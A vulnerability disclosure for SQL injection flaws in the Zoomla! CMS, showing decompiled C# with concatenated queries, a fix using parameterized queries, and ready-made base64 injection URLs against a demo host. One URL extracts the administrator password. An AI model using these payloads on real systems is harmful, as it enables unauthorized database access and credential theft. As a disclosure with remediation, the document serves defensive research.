2014-08-09: Details sent to the vendor, awaiting vendor handling
2014-08-10: Vendor has confirmed; details disclosed to the vendor only
2014-08-13: Details opened to third-party security partners
2014-10-04: Details opened to core white hats and experts in the relevant field
2014-10-14: Details opened to regular white hats
2014-10-24: Details opened to intern white hats
2014-11-07: Details disclosed to the public

No login required, a perfect injection point!
0x1

In App_Web_rckpp0om.dll, the User_file class's Page_Load() event is already flawed:

    if ((base.Request["state"] != null) && (base.Request["state"] == "tr"))
    {
        string str4 = base.Request.QueryString["FD"];
        this.FileUrl = this.FileJiema(str4);
        this.hid.Value = str4;
        this.file = this.bfile.SelectFile(string.Concat(new object[] { " FileName='", this.FileUrl, "' and userid=", this.ull.GetLogin().UserID })); // injection point
        if (this.file.DownUrl == null)
        {
            base.Response.Write("0");
            base.Response.End();
        }
    }

Now look at the bfile.SelectFile(string) method, which builds the SQL statement by string concatenation:

    public M_File SelectFile(string where)
    {
        if (where == "")
        {
            this.sql = "select * from ZL_File";
        }
        else
        {
            this.sql = "select * from ZL_File where " + where;
        }
        M_File file = new M_File();
        SqlDataReader reader = SqlHelper.ExecuteReader(CommandType.Text, this.sql);
        if (reader.Read())
        {
            file.UserID = Convert.ToInt32(reader["UserID"]);
            file.State = Convert.ToInt32(reader["State"]);
            file.ExtractionCode = reader["ExtractionCode"].ToString();
            file.DownUrl = reader["DownUrl"].ToString();
            file.FileName = reader["FileName"].ToString();
            file.FileMD5 = reader["FileMD5"].ToString();
        }
        return file;
    }

base.Request.QueryString["FD"] is user-controlled: my favourite kind of injection point, with the injection statement passed in base64!

Searching for the page that uses the User_file class gives the URL http://demo.zoomla.cn/common/file.aspx?FD=xxx&state=tr
FD=JyBhbmQgQEB2ZXJzaW9uPjAgYW5kICcxJz0nMQ%3d%3d&state=tr
FD=JyBhbmQgKHNlbGVjdCB0b3AgMSBBZG1pblBhc3N3b3JkIGZyb20gWkxfTWFuYWdlcik%2bMCBhbmQgJzEnPScx&state=tr

In theory this point also allows arbitrary file reads.

0x2
The Edit_Statistics class in App_Web_acbkzcqn.dll:

    protected void Page_Load(object sender, EventArgs e)
    {
        this.GroupID = this.buser.GetLogin().GroupID;
        string groupName = this.bGll.GetByID(this.GroupID).GroupName;
        if (base.Request.QueryString["GID"] != null)
        {
            base.Request.QueryString["GID"].ToString();
            M_Node nodeXML = this.bll.GetNodeXML(DataConverter.CLng(DataConverter.CLng(base.Request.QueryString["NodeID"])));
            XmlDocument document = new XmlDocument();
            try
            {
                document.Load(base.Server.MapPath("/Config/Payment.xml"));
            }
            catch (Exception)
            {
                function.WriteErrMsg("出现错误");
            }
            XmlNode node2 = document.SelectSingleNode("UserGroups/" + function.GetChineseFirstChar(groupName) + "/Manner");
            this.Articles = DataConverter.CLng(node2.Attributes["Articles"].Value);
            M_Bnum bnum = this.b_EditWord.SelectBnum(string.Concat(new object[] { " datediff(week,browsertime,getdate())=0 and uid=", this.buser.GetLogin().UserID, " and GID=", base.Request.QueryString["GID"], " order by acid desc" })); // injection point
            this.BEcount = this.b_EditWord.BnumCount("");
            this.NodeBecount = this.b_EditWord.BnumCount("count(distinct(gid))| and nodeid=" + base.Request.QueryString["NodeID"]);
        }
    }

GID is injectable; NodeID just needs to carry the value from a normal visit. I won't test Edit/Statistics.aspx; vendor, please fix it.
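As an added example (not Zoomla!'s own code), this is how both query sites above could be hardened: the "where fragment" API of SelectFile is replaced by a method that binds FileName and UserID as SqlParameters, and the GID/NodeID values read in Edit_Statistics.Page_Load are parsed as integers before they can reach any query. M_File is assumed to be the project's existing model class; the SafeQueries class and RequireInt helper are hypothetical names.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;
using System.Globalization;

// Hypothetical hardened helpers (added example, not Zoomla! code).
// M_File is assumed to be the project's existing model class shown above.
public static class SafeQueries
{
    // Replacement for bfile.SelectFile(" FileName='...' and userid=..."):
    // callers pass values, never a SQL fragment, and both are bound as parameters,
    // so a quote inside the decoded FD value is just data inside @FileName.
    public static M_File SelectFile(SqlConnection conn, string fileName, int userId)
    {
        const string sql =
            "SELECT TOP 1 UserID, State, ExtractionCode, DownUrl, FileName, FileMD5 " +
            "FROM ZL_File WHERE FileName = @FileName AND UserID = @UserID";
        var file = new M_File();
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@FileName", SqlDbType.NVarChar, 255).Value = fileName;
            cmd.Parameters.Add("@UserID", SqlDbType.Int).Value = userId;
            using (SqlDataReader reader = cmd.ExecuteReader())
            {
                if (reader.Read())
                {
                    file.UserID = Convert.ToInt32(reader["UserID"]);
                    file.State = Convert.ToInt32(reader["State"]);
                    file.ExtractionCode = reader["ExtractionCode"].ToString();
                    file.DownUrl = reader["DownUrl"].ToString();
                    file.FileName = reader["FileName"].ToString();
                    file.FileMD5 = reader["FileMD5"].ToString();
                }
            }
        }
        return file;
    }

    // For Edit_Statistics.Page_Load: GID and NodeID must be integers, so parse them
    // strictly before use. Anything that is not a plain unsigned integer is rejected
    // here, and the parsed int (never the raw string) is what gets bound in the query.
    public static int RequireInt(string raw, string name)
    {
        if (!int.TryParse(raw, NumberStyles.None, CultureInfo.InvariantCulture, out int value))
            throw new ArgumentException(name + " must be a non-negative integer");
        return value;
    }
}
// Page_Load usage: int gid = SafeQueries.RequireInt(Request.QueryString["GID"], "GID");
```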
http://demo.zoomla.cn/common/file.aspx?FD=JyBhbmQgKHNlbGVjdCB0b3AgMSBBZG1pblBhc3N3b3JkIGZyb20gWkxfTWFuYWdlcik%2bMCBhbmQgJzEnPScx&state=tr
http://demo.zoomla.cn/common/file.aspx?FD=JyBhbmQgQEB2ZXJzaW9uPjAgYW5kICcxJz0nMQ%3d%3d&state=tr
Severity: Medium
Vulnerability Rank: 5
Confirmed at: 2014-08-10 13:41
Thanks
None yet